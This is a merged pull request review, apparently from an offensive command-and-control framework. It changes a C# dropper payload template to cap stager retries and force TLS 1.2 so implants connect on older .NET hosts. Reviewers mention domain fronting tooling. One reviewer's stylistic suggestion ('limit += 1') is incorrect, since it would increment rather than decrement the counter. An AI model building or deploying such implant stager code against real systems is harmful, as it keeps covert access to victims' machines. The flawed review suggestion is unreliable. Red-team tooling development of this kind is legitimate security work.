### PR TITLE
Payload stage retries limit

### PR DESCRIPTION
**Pull request by benpturner**

### CODE REVIEW

File: resources/payload-templates/dropper.cs [hunk 1]
```diff
@@ -44,13 +44,16 @@ public static void Sharp()
...
 			int waitTime = #REPLACESTAGERRETRIESWAIT# * 1000;
 			var mre = new System.Threading.ManualResetEvent(false);
-			while(true){
+			while (true && limit > 0) 
+			{
 				try {
 					primer();
 					break;
 				} catch {
+					limit = limit -1;
```
Comment (riskydissonance) [inline resources/payload-templates/dropper.cs:56]: Purely stylistic but you can write this is `limit += 1`

File: resources/payload-templates/dropper.cs [hunk 2]
```diff
@@ -100,6 +103,11 @@ static byte[] Combine(byte[] first, byte[] second)
 	}
 	static System.Net.WebClient GetWebRequest(string cookie)
 	{
+		try {
+			ServicePointManager.SecurityProtocol = (SecurityProtocolType)192 |(SecurityProtocolType)768 | (SecurityProtocolType)3072;
```
Comment (riskydissonance) [inline resources/payload-templates/dropper.cs:107]: Does this fix the TLS issues?

**Review by riskydissonance — APPROVED** [review]

File: resources/payload-templates/dropper.cs (hunk 2 above)
Comment (Console) [reply resources/payload-templates/dropper.cs:107]: Yeah, if a device has v4.0 and v4.5 frameworks installed you can define the value of the types directly and thus support TLSv1.2 on v4.0 payloads. Didn't realise Ben had already put this fix into public, you snooze you lose :)

If v4.5 doesn't exist on the host though, it'll crash, hence the try catch.

Comment (benpturner) [reply resources/payload-templates/dropper.cs:107]: Hopefully - need to test a lot to make sure it doesnt break anything else, e.g. dotnet v4.0 etc but the try catch should save that I think

Comment (riskydissonance) [reply resources/payload-templates/dropper.cs:107]: Ah sweet that's awesome :D

Comment (riskydissonance) [reply resources/payload-templates/dropper.cs:107]: @PwnDexter may want to update your FindFrontableDomains fork's colouring if so

**Pull request merged**